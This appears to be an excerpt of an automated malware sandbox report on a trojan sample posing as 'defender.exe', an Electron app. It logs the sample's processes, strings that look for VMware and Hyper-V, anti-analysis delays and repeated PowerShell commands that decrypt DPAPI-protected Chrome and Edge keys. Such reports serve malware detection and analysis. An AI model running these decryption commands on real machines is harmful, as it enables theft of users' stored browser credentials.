Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5076Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile Volume queried: C:\Users\user\AppData\Roaming\defender\Code Cache\wasm FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile Volume queried: C:\Users\user\AppData\Roaming\defender\Code Cache\js FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile Volume queried: C:\Users\user\AppData\Roaming\defender\blob_storage\eec40a8b-ed63-48a3-8846-2bb7e50354b4 FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile Volume queried: C:\Users\user\AppData\Roaming\defender\Cache\Cache_Data FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtPJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resourcesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeFile opened: C:\Users\user~1Jump to behavior
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: explorer.exe, 0000001D.00000000.1776329895.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
Source: explorer.exe, 0000001D.00000000.1776329895.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
Source: explorer.exe, 0000001D.00000000.1776329895.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000001D.00000000.1772877020.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001D.00000000.1771958390.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\defender" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\defender" --app-path="c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\defender" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exeProcess created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe "c:\users\user~1\appdata\local\temp\2gocimwnf4mqselug17heiczrtp\defender.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8Jump to behavior
